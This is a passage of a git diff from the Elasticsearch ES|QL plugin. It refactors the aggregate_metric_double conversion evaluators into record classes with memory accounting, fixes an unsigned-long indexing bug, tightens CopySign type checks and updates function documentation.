EvalOperator.ExpressionEvaluator() { - @Override - public Block eval(Page page) { - Block block = eval.eval(page); - if (block.areAllValuesNull()) { - return block; - } - try { - Block resultBlock = ((AggregateMetricDoubleBlock) block).getMetricBlock( - ((Number) subfieldIndex.fold(FoldContext.small())).intValue() - ); - resultBlock.incRef(); - return resultBlock; - } finally { - block.close(); - } - } - - @Override - public void close() { - Releasables.closeExpectNoException(eval); - } - - @Override - public String toString() { - return "FromAggregateMetricDoubleEvaluator[field=" + eval + ",subfieldIndex=" + subfieldIndex + "]"; - } - }; + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); + @Override + public Block eval(Page page) { + Block block = eval.eval(page); + if (block.areAllValuesNull()) { + return block; } - }; + try { + Block resultBlock = ((AggregateMetricDoubleBlock) block).getMetricBlock(subFieldIndex); + resultBlock.incRef(); + return resultBlock; + } finally { + block.close(); + } + } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public String toString() { + return "FromAggregateMetricDoubleEvaluator[field=" + eval + ",subfieldIndex=" + subFieldIndex + "]"; + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToAggregateMetricDouble.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToAggregateMetricDouble.java index 
87a4492f33094..d1c404f5025af 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToAggregateMetricDouble.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToAggregateMetricDouble.java @@ -7,8 +7,10 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.convert; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.compute.data.AggregateMetricDoubleArrayBlock; import org.elasticsearch.compute.data.AggregateMetricDoubleBlock; import org.elasticsearch.compute.data.AggregateMetricDoubleBlockBuilder; import org.elasticsearch.compute.data.Block; @@ -53,10 +55,10 @@ public class ToAggregateMetricDouble extends AbstractConvertFunction { private static final Map EVALUATORS = Map.ofEntries( Map.entry(AGGREGATE_METRIC_DOUBLE, (source, fieldEval) -> fieldEval), - Map.entry(DOUBLE, DoubleFactory::new), - Map.entry(INTEGER, IntFactory::new), - Map.entry(LONG, LongFactory::new), - Map.entry(UNSIGNED_LONG, UnsignedLongFactory::new) + Map.entry(DOUBLE, (source, fieldEval) -> new DoubleFactory(fieldEval)), + Map.entry(INTEGER, (source, fieldEval) -> new IntFactory(fieldEval)), + Map.entry(LONG, (source, fieldEval) -> new LongFactory(fieldEval)), + Map.entry(UNSIGNED_LONG, (source, fieldEval) -> new UnsignedLongFactory(fieldEval)) ); public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( @@ -147,7 +149,12 @@ private Block build() { try { doubleBlock = valuesBuilder.build().asBlock(); countBlock = blockFactory.newConstantIntBlockWith(1, doubleBlock.getPositionCount()); - AggregateMetricDoubleBlock aggBlock = new AggregateMetricDoubleBlock(doubleBlock, doubleBlock, doubleBlock, countBlock); + AggregateMetricDoubleBlock aggBlock = new AggregateMetricDoubleArrayBlock( + doubleBlock, + doubleBlock, + doubleBlock, + countBlock + ); doubleBlock.incRef(); doubleBlock.incRef(); success = true; @@ -166,13 +173,10 @@ public void close() { } public static class DoubleFactory implements EvalOperator.ExpressionEvaluator.Factory { - private final Source source; - private final EvalOperator.ExpressionEvaluator.Factory fieldEvaluator; - public DoubleFactory(Source source, EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { + public DoubleFactory(EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { this.fieldEvaluator = fieldEvaluator; - this.source = source; } @Override @@ -182,97 +186,95 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { - final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); - - return new EvalOperator.ExpressionEvaluator() { - private Block evalBlock(Block block) { - int positionCount = block.getPositionCount(); - DoubleBlock doubleBlock = (DoubleBlock) block; - try ( - AggregateMetricDoubleBlockBuilder builder = context.blockFactory() - .newAggregateMetricDoubleBlockBuilder(positionCount) - ) { - CompensatedSum compensatedSum = new CompensatedSum(); - for (int p = 0; p < positionCount; p++) { - int valueCount = doubleBlock.getValueCount(p); - if (valueCount == 0) { - builder.appendNull(); - continue; - } - int start = doubleBlock.getFirstValueIndex(p); - int end = start + valueCount; - if (valueCount == 1) { - double current = doubleBlock.getDouble(start); - builder.min().appendDouble(current); - 
builder.max().appendDouble(current); - builder.sum().appendDouble(current); - builder.count().appendInt(valueCount); - continue; - } - double min = Double.POSITIVE_INFINITY; - double max = Double.NEGATIVE_INFINITY; - for (int i = start; i < end; i++) { - double current = doubleBlock.getDouble(i); - min = Math.min(min, current); - max = Math.max(max, current); - compensatedSum.add(current); - } - builder.min().appendDouble(min); - builder.max().appendDouble(max); - builder.sum().appendDouble(compensatedSum.value()); - builder.count().appendInt(valueCount); - compensatedSum.reset(0, 0); - } - return builder.build(); - } - } + return new DoubleEvaluator(context.blockFactory(), fieldEvaluator.get(context)); + } + } - private Block evalVector(Vector vector) { - int positionCount = vector.getPositionCount(); - DoubleVector doubleVector = (DoubleVector) vector; - try ( - AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder( - positionCount, - context.blockFactory() - ) - ) { - for (int p = 0; p < positionCount; p++) { - double value = doubleVector.getDouble(p); - builder.appendValue(value); - } - return builder.build(); + public record DoubleEvaluator(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval) + implements + EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DoubleEvaluator.class); + + private Block evalBlock(Block block) { + int positionCount = block.getPositionCount(); + DoubleBlock doubleBlock = (DoubleBlock) block; + try (AggregateMetricDoubleBlockBuilder builder = blockFactory.newAggregateMetricDoubleBlockBuilder(positionCount)) { + CompensatedSum compensatedSum = new CompensatedSum(); + for (int p = 0; p < positionCount; p++) { + int valueCount = doubleBlock.getValueCount(p); + if (valueCount == 0) { + builder.appendNull(); + continue; } - } - - @Override - public Block eval(Page page) { - try (Block block = eval.eval(page)) { - Vector vector = block.asVector(); - return vector == null ? 
evalBlock(block) : evalVector(vector); + int start = doubleBlock.getFirstValueIndex(p); + int end = start + valueCount; + if (valueCount == 1) { + double current = doubleBlock.getDouble(start); + builder.min().appendDouble(current); + builder.max().appendDouble(current); + builder.sum().appendDouble(current); + builder.count().appendInt(valueCount); + continue; } + double min = Double.POSITIVE_INFINITY; + double max = Double.NEGATIVE_INFINITY; + for (int i = start; i < end; i++) { + double current = doubleBlock.getDouble(i); + min = Math.min(min, current); + max = Math.max(max, current); + compensatedSum.add(current); + } + builder.min().appendDouble(min); + builder.max().appendDouble(max); + builder.sum().appendDouble(compensatedSum.value()); + builder.count().appendInt(valueCount); + compensatedSum.reset(0, 0); } + return builder.build(); + } + } - @Override - public void close() { - Releasables.closeExpectNoException(eval); + private Block evalVector(Vector vector) { + int positionCount = vector.getPositionCount(); + DoubleVector doubleVector = (DoubleVector) vector; + try (AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder(positionCount, blockFactory)) { + for (int p = 0; p < positionCount; p++) { + double value = doubleVector.getDouble(p); + builder.appendValue(value); } + return builder.build(); + } + } - @Override - public String toString() { - return "ToAggregateMetricDoubleFromDoubleEvaluator[field=" + eval + "]"; - } - }; + @Override + public Block eval(Page page) { + try (Block block = eval.eval(page)) { + Vector vector = block.asVector(); + return vector == null ? evalBlock(block) : evalVector(vector); + } + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public String toString() { + return "ToAggregateMetricDoubleFromDoubleEvaluator[field=" + eval + "]"; } } public static class IntFactory implements EvalOperator.ExpressionEvaluator.Factory { - private final Source source; - private final EvalOperator.ExpressionEvaluator.Factory fieldEvaluator; - public IntFactory(Source source, EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { + public IntFactory(EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { this.fieldEvaluator = fieldEvaluator; - this.source = source; } @Override @@ -282,97 +284,95 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { - final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); - - return new EvalOperator.ExpressionEvaluator() { - @Override - public Block eval(Page page) { - try (Block block = eval.eval(page)) { - Vector vector = block.asVector(); - return vector == null ? 
evalBlock(block) : evalVector(vector); - } - } + return new IntEvaluator(context.blockFactory(), fieldEvaluator.get(context)); + } + } - private Block evalBlock(Block block) { - int positionCount = block.getPositionCount(); - IntBlock intBlock = (IntBlock) block; - try ( - AggregateMetricDoubleBlockBuilder builder = context.blockFactory() - .newAggregateMetricDoubleBlockBuilder(positionCount) - ) { - CompensatedSum sum = new CompensatedSum(); - for (int p = 0; p < positionCount; p++) { - int valueCount = intBlock.getValueCount(p); - int start = intBlock.getFirstValueIndex(p); - int end = start + valueCount; - if (valueCount == 0) { - builder.appendNull(); - continue; - } - if (valueCount == 1) { - double current = intBlock.getInt(start); - builder.min().appendDouble(current); - builder.max().appendDouble(current); - builder.sum().appendDouble(current); - builder.count().appendInt(valueCount); - continue; - } - double min = Double.POSITIVE_INFINITY; - double max = Double.NEGATIVE_INFINITY; - for (int i = start; i < end; i++) { - double current = intBlock.getInt(i); - min = Math.min(min, current); - max = Math.max(max, current); - sum.add(current); - } - builder.min().appendDouble(min); - builder.max().appendDouble(max); - builder.sum().appendDouble(sum.value()); - builder.count().appendInt(valueCount); - sum.reset(0, 0); - } - return builder.build(); - } - } + public record IntEvaluator(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval) + implements + EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(IntEvaluator.class); - private Block evalVector(Vector vector) { - int positionCount = vector.getPositionCount(); - IntVector intVector = (IntVector) vector; - try ( - AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder( - positionCount, - context.blockFactory() - ) - ) { - for (int p = 0; p < positionCount; p++) { - double value = intVector.getInt(p); - builder.appendValue(value); - } - return builder.build(); + @Override + public Block eval(Page page) { + try (Block block = eval.eval(page)) { + Vector vector = block.asVector(); + return vector == null ? 
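+ // Editorial note: a non-null Vector guarantees exactly one non-null value per position,
+ // so evalVector() can skip the null and multi-value bookkeeping that evalBlock() performs.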
evalBlock(block) : evalVector(vector); + } + } + + private Block evalBlock(Block block) { + int positionCount = block.getPositionCount(); + IntBlock intBlock = (IntBlock) block; + try (AggregateMetricDoubleBlockBuilder builder = blockFactory.newAggregateMetricDoubleBlockBuilder(positionCount)) { + CompensatedSum sum = new CompensatedSum(); + for (int p = 0; p < positionCount; p++) { + int valueCount = intBlock.getValueCount(p); + int start = intBlock.getFirstValueIndex(p); + int end = start + valueCount; + if (valueCount == 0) { + builder.appendNull(); + continue; } + if (valueCount == 1) { + double current = intBlock.getInt(start); + builder.min().appendDouble(current); + builder.max().appendDouble(current); + builder.sum().appendDouble(current); + builder.count().appendInt(valueCount); + continue; + } + double min = Double.POSITIVE_INFINITY; + double max = Double.NEGATIVE_INFINITY; + for (int i = start; i < end; i++) { + double current = intBlock.getInt(i); + min = Math.min(min, current); + max = Math.max(max, current); + sum.add(current); + } + builder.min().appendDouble(min); + builder.max().appendDouble(max); + builder.sum().appendDouble(sum.value()); + builder.count().appendInt(valueCount); + sum.reset(0, 0); } + return builder.build(); + } + } - @Override - public void close() { - Releasables.closeExpectNoException(eval); + private Block evalVector(Vector vector) { + int positionCount = vector.getPositionCount(); + IntVector intVector = (IntVector) vector; + try (AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder(positionCount, blockFactory)) { + for (int p = 0; p < positionCount; p++) { + double value = intVector.getInt(p); + builder.appendValue(value); } + return builder.build(); + } + } - @Override - public String toString() { - return "ToAggregateMetricDoubleFromIntEvaluator[field=" + eval + "]"; - } - }; + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public String toString() { + return "ToAggregateMetricDoubleFromIntEvaluator[field=" + eval + "]"; } } public static class LongFactory implements EvalOperator.ExpressionEvaluator.Factory { - private final Source source; - private final EvalOperator.ExpressionEvaluator.Factory fieldEvaluator; - public LongFactory(Source source, EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { + public LongFactory(EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { this.fieldEvaluator = fieldEvaluator; - this.source = source; } @Override @@ -382,97 +382,95 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { - final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); - - return new EvalOperator.ExpressionEvaluator() { - private Block evalBlock(Block block) { - int positionCount = block.getPositionCount(); - LongBlock longBlock = (LongBlock) block; - try ( - AggregateMetricDoubleBlockBuilder builder = context.blockFactory() - .newAggregateMetricDoubleBlockBuilder(positionCount) - ) { - CompensatedSum sum = new CompensatedSum(); - for (int p = 0; p < positionCount; p++) { - int valueCount = longBlock.getValueCount(p); - int start = longBlock.getFirstValueIndex(p); - int end = start + valueCount; - if (valueCount == 0) { - builder.appendNull(); - continue; - } - if (valueCount == 1) { - double current = longBlock.getLong(start); - builder.min().appendDouble(current); - 
builder.max().appendDouble(current); - builder.sum().appendDouble(current); - builder.count().appendInt(valueCount); - continue; - } - double min = Double.POSITIVE_INFINITY; - double max = Double.NEGATIVE_INFINITY; - for (int i = start; i < end; i++) { - double current = longBlock.getLong(i); - min = Math.min(min, current); - max = Math.max(max, current); - sum.add(current); - } - builder.min().appendDouble(min); - builder.max().appendDouble(max); - builder.sum().appendDouble(sum.value()); - builder.count().appendInt(valueCount); - sum.reset(0, 0); - } - return builder.build(); - } - } + return new LongEvaluator(context.blockFactory(), fieldEvaluator.get(context)); + } + } - private Block evalVector(Vector vector) { - int positionCount = vector.getPositionCount(); - LongVector longVector = (LongVector) vector; - try ( - AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder( - positionCount, - context.blockFactory() - ) - ) { - for (int p = 0; p < positionCount; p++) { - double value = longVector.getLong(p); - builder.appendValue(value); - } - return builder.build(); + public record LongEvaluator(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval) + implements + EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LongEvaluator.class); + + private Block evalBlock(Block block) { + int positionCount = block.getPositionCount(); + LongBlock longBlock = (LongBlock) block; + try (AggregateMetricDoubleBlockBuilder builder = blockFactory.newAggregateMetricDoubleBlockBuilder(positionCount)) { + CompensatedSum sum = new CompensatedSum(); + for (int p = 0; p < positionCount; p++) { + int valueCount = longBlock.getValueCount(p); + int start = longBlock.getFirstValueIndex(p); + int end = start + valueCount; + if (valueCount == 0) { + builder.appendNull(); + continue; } - } - - @Override - public Block eval(Page page) { - try (Block block = eval.eval(page)) { - Vector vector = block.asVector(); - return vector == null ? 
evalBlock(block) : evalVector(vector); + if (valueCount == 1) { + double current = longBlock.getLong(start); + builder.min().appendDouble(current); + builder.max().appendDouble(current); + builder.sum().appendDouble(current); + builder.count().appendInt(valueCount); + continue; } + double min = Double.POSITIVE_INFINITY; + double max = Double.NEGATIVE_INFINITY; + for (int i = start; i < end; i++) { + double current = longBlock.getLong(i); + min = Math.min(min, current); + max = Math.max(max, current); + sum.add(current); + } + builder.min().appendDouble(min); + builder.max().appendDouble(max); + builder.sum().appendDouble(sum.value()); + builder.count().appendInt(valueCount); + sum.reset(0, 0); } + return builder.build(); + } + } - @Override - public void close() { - Releasables.closeExpectNoException(eval); + private Block evalVector(Vector vector) { + int positionCount = vector.getPositionCount(); + LongVector longVector = (LongVector) vector; + try (AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder(positionCount, blockFactory)) { + for (int p = 0; p < positionCount; p++) { + double value = longVector.getLong(p); + builder.appendValue(value); } + return builder.build(); + } + } - @Override - public String toString() { - return "ToAggregateMetricDoubleFromLongEvaluator[field=" + eval + "]"; - } - }; + @Override + public Block eval(Page page) { + try (Block block = eval.eval(page)) { + Vector vector = block.asVector(); + return vector == null ? evalBlock(block) : evalVector(vector); + } + } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public String toString() { + return "ToAggregateMetricDoubleFromLongEvaluator[field=" + eval + "]"; } } public static class UnsignedLongFactory implements EvalOperator.ExpressionEvaluator.Factory { - private final Source source; - private final EvalOperator.ExpressionEvaluator.Factory fieldEvaluator; - public UnsignedLongFactory(Source source, EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { + public UnsignedLongFactory(EvalOperator.ExpressionEvaluator.Factory fieldEvaluator) { this.fieldEvaluator = fieldEvaluator; - this.source = source; } @Override @@ -482,86 +480,87 @@ public String toString() { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { - final EvalOperator.ExpressionEvaluator eval = fieldEvaluator.get(context); - - return new EvalOperator.ExpressionEvaluator() { - private Block evalBlock(Block block) { - int positionCount = block.getPositionCount(); - LongBlock longBlock = (LongBlock) block; - try ( - AggregateMetricDoubleBlockBuilder builder = context.blockFactory() - .newAggregateMetricDoubleBlockBuilder(positionCount) - ) { - CompensatedSum sum = new CompensatedSum(); - for (int p = 0; p < positionCount; p++) { - int valueCount = longBlock.getValueCount(p); - int start = longBlock.getFirstValueIndex(p); - int end = start + valueCount; - if (valueCount == 0) { - builder.appendNull(); - continue; - } - if (valueCount == 1) { - double current = EsqlDataTypeConverter.unsignedLongToDouble(longBlock.getLong(p)); - builder.min().appendDouble(current); - builder.max().appendDouble(current); - builder.sum().appendDouble(current); - builder.count().appendInt(valueCount); - continue; - } - double min = Double.POSITIVE_INFINITY; - double max = Double.NEGATIVE_INFINITY; - for (int i = start; i < end; i++) { - double current 
= EsqlDataTypeConverter.unsignedLongToDouble(longBlock.getLong(p)); - min = Math.min(min, current); - max = Math.max(max, current); - sum.add(current); - } - builder.min().appendDouble(min); - builder.max().appendDouble(max); - builder.sum().appendDouble(sum.value()); - builder.count().appendInt(valueCount); - sum.reset(0, 0); - } - return builder.build(); - } - } + return new UnsignedLong(context.blockFactory(), fieldEvaluator.get(context)); + } + } - private Block evalVector(Vector vector) { - int positionCount = vector.getPositionCount(); - LongVector longVector = (LongVector) vector; - try ( - AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder( - positionCount, - context.blockFactory() - ) - ) { - for (int p = 0; p < positionCount; p++) { - double value = EsqlDataTypeConverter.unsignedLongToDouble(longVector.getLong(p)); - builder.appendValue(value); - } - return builder.build(); + public record UnsignedLong(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval) + implements + EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(UnsignedLong.class); + + private Block evalBlock(Block block) { + int positionCount = block.getPositionCount(); + LongBlock longBlock = (LongBlock) block; + try (AggregateMetricDoubleBlockBuilder builder = blockFactory.newAggregateMetricDoubleBlockBuilder(positionCount)) { + CompensatedSum sum = new CompensatedSum(); + for (int p = 0; p < positionCount; p++) { + int valueCount = longBlock.getValueCount(p); + int start = longBlock.getFirstValueIndex(p); + int end = start + valueCount; + if (valueCount == 0) { + builder.appendNull(); + continue; } - - @Override - public Block eval(Page page) { - try (Block block = eval.eval(page)) { - Vector vector = block.asVector(); - return vector == null ? evalBlock(block) : evalVector(vector); + if (valueCount == 1) { + double current = EsqlDataTypeConverter.unsignedLongToDouble(longBlock.getLong(start)); + builder.min().appendDouble(current); + builder.max().appendDouble(current); + builder.sum().appendDouble(current); + builder.count().appendInt(valueCount); + continue; } + double min = Double.POSITIVE_INFINITY; + double max = Double.NEGATIVE_INFINITY; + for (int i = start; i < end; i++) { + double current = EsqlDataTypeConverter.unsignedLongToDouble(longBlock.getLong(i)); + min = Math.min(min, current); + max = Math.max(max, current); + sum.add(current); + } + builder.min().appendDouble(min); + builder.max().appendDouble(max); + builder.sum().appendDouble(sum.value()); + builder.count().appendInt(valueCount); + sum.reset(0, 0); } + return builder.build(); + } + } - @Override - public void close() { - Releasables.closeExpectNoException(eval); + private Block evalVector(Vector vector) { + int positionCount = vector.getPositionCount(); + LongVector longVector = (LongVector) vector; + try (AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder(positionCount, blockFactory)) { + for (int p = 0; p < positionCount; p++) { + double value = EsqlDataTypeConverter.unsignedLongToDouble(longVector.getLong(p)); + builder.appendValue(value); } + return builder.build(); + } + } - @Override - public String toString() { - return "ToAggregateMetricDoubleFromUnsignedLongEvaluator[field=" + eval + "]"; - } - }; + @Override + public Block eval(Page page) { + try (Block block = eval.eval(page)) { + Vector vector = block.asVector(); + return vector == null ? 
evalBlock(block) : evalVector(vector); + } + } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public String toString() { + return "ToAggregateMetricDoubleFromUnsignedLongEvaluator[field=" + eval + "]"; } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromAggregateMetricDoubleEvaluator.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromAggregateMetricDoubleEvaluator.java index e67ba29ab0227..2d8ffbd34b649 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromAggregateMetricDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromAggregateMetricDoubleEvaluator.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.convert; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.AggregateMetricDoubleBlock; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -20,6 +21,10 @@ import static org.elasticsearch.xpack.esql.type.EsqlDataTypeConverter.aggregateMetricDoubleBlockToString; public class ToStringFromAggregateMetricDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance( + ToStringFromAggregateMetricDoubleEvaluator.class + ); + private final EvalOperator.ExpressionEvaluator field; public ToStringFromAggregateMetricDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { @@ -62,6 +67,11 @@ public String toString() { return "ToStringFromAggregateMetricDoubleEvaluator[field=" + field + ']'; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + @Override public void close() { Releasables.closeExpectNoException(field); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTrunc.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTrunc.java index 6981c8e3b9d82..fc59d3471863c 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTrunc.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTrunc.java @@ -67,8 +67,9 @@ public interface DateTruncFactoryProvider { examples = { @Example(file = "date", tag = "docsDateTrunc"), @Example( - description = "Combine `DATE_TRUNC` with <> to create date histograms. For\n" - + "example, the number of hires per year:", + description = "Combine `DATE_TRUNC` with [`STATS`](/reference/query-languages/esql/commands/stats-by.md) " + + "to create date histograms. 
" + + "For example, the number of hires per year:", file = "date", tag = "docsDateTruncHistogram" ), diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySign.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySign.java index 884c67c38a3f9..83eb43627aa99 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySign.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySign.java @@ -15,6 +15,7 @@ import org.elasticsearch.xpack.esql.EsqlIllegalArgumentException; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.Expressions; +import org.elasticsearch.xpack.esql.core.expression.TypeResolutions; import org.elasticsearch.xpack.esql.core.tree.NodeInfo; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; @@ -60,21 +61,20 @@ EvalOperator.ExpressionEvaluator.Factory create( private DataType dataType; - @FunctionInfo( - description = "Returns a value with the magnitude of the first argument and the sign of the second argument. " - + "This function is similar to Java's Math.copySign(double magnitude, double sign).", - returnType = { "double", "float" } - ) + @FunctionInfo(description = """ + Returns a value with the magnitude of the first argument and the sign of the second argument. + This function is similar to Java's Math.copySign(double magnitude, double sign) which is + similar to `copysign` from [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754).""", returnType = { "double", "integer", "long" }) public CopySign( Source source, @Param( name = "magnitude", - type = { "double", "float", "integer", "long" }, + type = { "double", "integer", "long" }, description = "The expression providing the magnitude of the result. Must be a numeric type." ) Expression magnitude, @Param( name = "sign", - type = { "double", "float", "integer", "long" }, + type = { "double", "integer", "long" }, description = "The expression providing the sign of the result. Must be a numeric type." ) Expression sign ) { @@ -125,11 +125,25 @@ public TypeResolution resolveType() { } var magnitude = children().get(0); var sign = children().get(1); - if (magnitude.dataType().isNumeric() == false) { - return new TypeResolution("Magnitude must be a numeric type"); + TypeResolution resolution = TypeResolutions.isType( + magnitude, + t -> t.isNumeric() && t != DataType.UNSIGNED_LONG, + sourceText(), + TypeResolutions.ParamOrdinal.FIRST, + "numeric" + ); + if (resolution.unresolved()) { + return resolution; } - if (sign.dataType().isNumeric() == false) { - return new TypeResolution("Sign must be a numeric type"); + resolution = TypeResolutions.isType( + sign, + t -> t.isNumeric() && t != DataType.UNSIGNED_LONG, + sourceText(), + TypeResolutions.ParamOrdinal.SECOND, + "numeric" + ); + if (resolution.unresolved()) { + return resolution; } // The return type is the same as the magnitude type, so we can use it directly. 
dataType = magnitude.dataType(); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/Scalb.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/Scalb.java index b23b2323d0498..ff07e1c71a4c6 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/Scalb.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/Scalb.java @@ -20,6 +20,8 @@ import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.core.util.NumericUtils; import org.elasticsearch.xpack.esql.expression.function.Example; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesTo; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesToLifecycle; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.Param; import org.elasticsearch.xpack.esql.expression.function.scalar.EsqlScalarFunction; @@ -40,11 +42,16 @@ public class Scalb extends EsqlScalarFunction { private final Expression d; private final Expression scaleFactor; - @FunctionInfo(returnType = "double", description = """ - Returns the result of `d * 2 ^ scaleFactor`, - Similar to Java's `scalb` function. Result is rounded as if - performed by a single correctly rounded floating-point multiply - to a member of the double value set.""", examples = @Example(file = "floats", tag = "scalb")) + @FunctionInfo( + returnType = "double", + description = """ + Returns the result of `d * 2 ^ scaleFactor`, + Similar to Java's `scalb` function. Result is rounded as if + performed by a single correctly rounded floating-point multiply + to a member of the double value set.""", + examples = @Example(file = "floats", tag = "scalb"), + appliesTo = { @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1.0") } + ) public Scalb( Source source, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvConcat.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvConcat.java index cae366ed7d08d..293cc369ecfa7 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvConcat.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvConcat.java @@ -9,6 +9,7 @@ import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.BytesRefBuilder; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.compute.data.Block; @@ -16,6 +17,7 @@ import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.operator.DriverContext; import 